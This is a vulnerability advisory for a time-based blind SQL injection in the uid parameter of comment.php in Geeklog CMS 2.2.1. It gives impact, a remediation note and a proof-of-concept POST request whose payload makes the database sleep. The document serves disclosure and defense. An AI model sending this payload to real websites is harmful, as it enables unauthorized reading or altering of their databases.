Geeklog 2.2.1 Blind SQL Injection

Geeklog 2.2.1 Blind SQL Injection

Geeklog 2.2.1 - Blind SQL Injection
Advisory Geeklog 2.2.1 Blind SQL Injection

Geeklog 2.2.1 - Blind SQL Injection
Advisory ID: RO-20-002
Severity: Critical
Vendor: Geeklog
Product: Geeklog CMS
Version: 2.2.1


Overview #

A Blind SQL Injection vulnerability exists in Geeklog CMS version 2.2.1. The vulnerability allows remote attackers to execute arbitrary SQL commands via the uid parameter in comment.php.


Vulnerability Details #

Affected Versions: 2.2.1 and earlier

Location: comment.php

Affected Parameter: uid

Root Cause: Insufficient input validation on the uid parameter allows SQL Injection attacks.


Exploitation Requirements #

No authentication required
Direct access to the comment endpoint

Impact #

Remote attackers can exploit this vulnerability to:

Extract sensitive data from the database
Bypass authentication mechanisms
Modify or delete database content

Proof of Concept #

POST /geeklog-2.2.1/public_html/comment.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

uid=2+++((SELECT+1+FROM+(SELECT+SLEEP(25))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR"*/

Time-based Blind SQL Injection: If the server response is delayed by 25 seconds, the target is vulnerable.


Solution #

Upgrade to a patched version of Geeklog that includes proper input sanitization and parameterized queries.


References #

Invicti Advisory NS-20-002

Timeline:

[2020-01-01] - Discovered

Credits: Omar Kurt